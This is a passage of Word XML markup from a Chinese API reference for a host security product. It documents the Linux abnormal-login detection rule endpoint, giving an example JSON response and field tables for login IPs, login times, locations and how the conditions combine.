      </w:r>
    </w:p>
    <w:p w14:paraId="1C433E55" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/detect/abnormallogin/linux/rule/5a5dceb83171a7202baafae4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABB0E68" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55248937" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "id": "5a9d026a7d761b3ccfcf2c3d",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "osType": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "realmKind": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "realmGroup": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "realmAgentId": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "realmAgentGroup": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "condition": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "loginIps": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "loginTimes": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "start": "08:00",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "end": "10:00",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "startMinutes": 480,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "endMinutes": 600,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "weeks": [1, 2, 3 ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "loginLocations": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "country": "中国",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "province": "北京",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "city": ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "combineType": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "combineTypeAll": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B0F039"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925"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="3634"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="5FC09C7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FFCB478" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CA41984" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E73A016" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34D1629B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3675D228" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B3F57FF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="481FB883" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03F66292" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E301A83" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>规则ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="404269E5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="610C15B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>osType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27A99E0B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3120C4F1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51302D30" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>系统类型，1:linux 2:windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="01AE88B9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EE55FC4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>realmKind</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5097B96B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67B12831" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="125FD657" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机范围:0-全部主机;1-主机 2-业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="42B1E0DA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FBFCEC4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>realmGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C6BF978" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="754E26EA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5237D34C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组，realmKind=2, 该字段有值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="25CE5BF6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D0BE7A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>realmAgentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CC2F76B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E9A801D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7831B3DF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机，realmKind=1, 该字段有值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7CE8F93A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78AAC035" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>realmAgentGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="499CBB46" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CC93663" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E383227" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机所在业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="639446F1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10AE180A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01DCF5C1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14CC907B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06CF8E57" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>规则详情，参见</w:t>
            </w:r>
            <w:hyperlink w:anchor="condition数据结构">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>condition数据结构</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4A727340" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="144" w:name="condition数据结构"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>condition数据结构</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1745"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1070"/>
        <w:gridCol w:w="3792"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="6B979C4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3BC4714" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08FF822A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D314C11" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="773FF499" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="09354690" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32530BA9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>loginIps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36F33154" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AB842AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79E2B48C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>登录IP，参见</w:t>
            </w:r>
            <w:hyperlink w:anchor="loginips数据结构">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>loginIps数据结构</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="47D54069" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BE0C4C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>loginTimes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58E9BE30" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A32249C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10B3411A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>登录时间，</w:t>
            </w:r>
            <w:hyperlink w:anchor="logintimes数据结构">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>loginTimes数据结构</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1BACC765" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B14DE4D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>loginLocations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AA107DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EB78599" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="018D1009" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>登录区域，</w:t>
            </w:r>
            <w:hyperlink w:anchor="loginlocations数据结构">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>loginLocations数据结构</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6098FBAC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E6A21EB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>combineType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58A40A80" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2833B5A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62CCA9BF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1:所有条件均满足 2:任一条件满足</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="787CFEEE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67FBD5EA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>combineTypeAll</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="434A6972" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18BC026C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FB5B210" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>条件组合方式 true：所有条件满足(默认)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E4CD8AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="145" w:name="loginips数据结构"/>
      <w:bookmarkEnd w:id="144"/>
      <w:r>
        <w:t>loginIps数据结构</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="902"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1320"/>
        <w:gridCol w:w="3280"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="42F91FE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521A4E4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46BF8749" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CB5C7CC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24BEB381" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="499CCEDF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A4991B2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23673D05" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A9CBD1C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint（1）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A0FC245" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>IP类型，1：普通IP/CIDR 2：IP段</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="68F6D83F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FB919F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B25706C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
